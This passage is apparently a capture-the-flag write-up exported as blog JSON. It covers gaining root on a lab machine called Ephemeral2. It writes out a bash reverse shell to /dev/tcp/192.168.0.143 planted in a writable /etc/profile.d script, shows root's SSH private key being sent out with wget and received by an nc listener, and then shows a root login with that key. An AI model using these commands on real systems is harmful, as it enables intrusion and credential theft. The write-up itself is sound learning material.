<code>linpeas.sh<\/code> and <code>pspy64<\/code>!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108727.png\" alt=\"image-20240430204932874\" \/><\/p>\n<p>Very conspicuous; I am certain this is the way in!!!!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108728.png\" alt=\"image-20240430205002259\" \/><\/p>\n<h3>Checking the configuration files<\/h3>\n<pre><code class=\"language-bash\">(remote) randy@ephemeral:\/tmp$ cd  \/etc\/profile.d\n(remote) randy@ephemeral:\/etc\/profile.d$ ls -la\ntotal 48\ndrwxr-xr-x   2 randy root  4096 Apr  9  2022 .\ndrwxr-xr-x 132 root  root 12288 Apr 10  2022 ..\n-rw-r--r--   1 randy root    97 Apr  9  2022 01-locale-fix.sh\n-rw-r--r--   1 randy root   835 Feb 18  2022 apps-bin-path.sh\n-rw-r--r--   1 randy root   729 Feb  1  2020 bash_completion.sh\n-rw-r--r--   1 randy root  1003 Aug 13  2019 
cedilla-portuguese.sh\n-rw-r--r--   1 randy root   349 Oct 28  2020 im-config_wayland.sh\n-rw-r--r--   1 randy root  1368 Apr  9  2022 vte-2.91.sh\n-rw-r--r--   1 randy root   967 Apr  9  2022 vte.csh\n-rw-r--r--   1 randy root   954 Mar 26  2020 xdg_dirs_desktop_session.sh\n(remote) randy@ephemeral:\/etc\/profile.d$ head 01-locale-fix.sh \n# Make sure the locale variables are set to valid values.\neval $(\/usr\/bin\/locale-check C.UTF-8)<\/code><\/pre>\n<p>This is actually the directory of scripts that run automatically after startup, so adding a reverse shell here would be enough to get a callback; the problem is that the <code>ralph<\/code> user is not logging in, so we cannot get a shell as ralph or as <code>root<\/code> this way. Let's take a look with <code>pspy64<\/code>!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108729.png\" alt=\"image-20240430205929680\" \/><\/p>\n<h3>Analysing the script to exploit<\/h3>\n<p>Let's take a look at this script:<\/p>\n<pre><code class=\"language-bash\">(remote) randy@ephemeral:\/tmp$ cat \/home\/ralph\/tools\/ssh.sh\n#!\/bin\/bash\n\n\/usr\/bin\/ssh -o &quot;StrictHostKeyChecking no&quot; ralph@localhost -i \/home\/ralph\/.ssh\/id_rsa<\/code><\/pre>\n<p>Write a reverse shell and let the scheduled task deliver the callback!<\/p>\n<pre><code class=\"language-bash\">(remote) randy@ephemeral:\/etc\/profile.d$ echo &#039;bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/2345 &lt;&amp;1&quot;&#039; &gt; shell.sh\n(remote) randy@ephemeral:\/etc\/profile.d$ chmod +x shell.sh<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302108730.png\" alt=\"image-20240430210340088\" \/><\/p>\n<p>nice!!!!<\/p>\n<h3>Escalating to root<\/h3>\n<p>Information gathering!<\/p>\n<pre><code class=\"language-bash\">File \/root\/.ssh\/id_rsa sent to 192.168.0.143\n\n--2024-04-30 07:05:26--  http:\/\/192.168.0.143\/\nConnecting to 192.168.0.143:80... connected.\nHTTP request sent, awaiting response... 
^C(remote) ralph@ephemeral:\/home\/ralph$ <\/code><\/pre>\n<p>Then receive it on the other side:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ nc -lvnp 80  \nlistening on [any] 80 ...\nconnect to [192.168.0.143] from (UNKNOWN) [192.168.0.132] 53996\nPOST \/ HTTP\/1.1\nUser-Agent: Wget\/1.20.3 (linux-gnu)\nAccept: *\/*\nAccept-Encoding: identity\nHost: 192.168.0.143\nConnection: Keep-Alive\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 2602\n<\/code><\/pre>\n<p>Could it really be this easy? Hahaha.<\/p>\n<p>Let's check whether we can log in with it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ vim root         \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ chmod 600 root                                \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2]\n\u2514\u2500$ ssh root@192.168.0.132 -i root                \nThe authenticity of host &#039;192.168.0.132 (192.168.0.132)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:flddRz8ds6vGH6oIgNv4hqo92558dFPJ3n8Fkzv15Uc.\nThis key is not known by any 
other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.0.132&#039; (ED25519) to the list of known hosts.\nWelcome to Ubuntu 20.04.4 LTS (GNU\/Linux 5.13.0-39-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n20 updates can be applied immediately.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nNew release &#039;22.04.3 LTS&#039; available.\nRun &#039;do-release-upgrade&#039; to upgrade to it.\n\nYour Hardware Enablement Stack (HWE) is supported until April 2025.\nLast login: Sun Apr 10 23:36:51 2022 from 10.0.0.69\nbash: connect: Connection refused\nbash: \/dev\/tcp\/192.168.0.143\/2345: Connection refused\nroot@ephemeral:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ephemeral:~# ls -la\ntotal 48\ndrwx------ 10 root root 4096 Apr 10  2022 .\ndrwxr-xr-x 20 root root 4096 Apr  7  2022 ..\nlrwxrwxrwx  1 root root    9 Apr  8  2022 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\ndrwx------  5 root root 4096 Apr 10  2022 .cache\ndrwx------  4 root root 4096 Apr  9  2022 .config\ndrwx------  3 root root 4096 Apr  9  2022 .dbus\ndrwxr-xr-x  2 root root 4096 Apr  9  2022 Downloads\ndrwxr-xr-x  3 root root 4096 Apr  7  2022 .local\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\ndrwxr-xr-x  2 root root 4096 Apr 10  2022 roottxt\ndrwx------  3 root root 4096 Apr  7  2022 snap\ndrwx------  2 root root 4096 Apr 10  2022 .ssh<\/code><\/pre>\n<p>Got the root shell!!!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ephemeral2 Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral2] 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-669","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/669","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=669"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/669\/revisions"}],"predecessor-version":[{"id":670,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/669\/revisions\/670"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=669"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=669"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=669"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}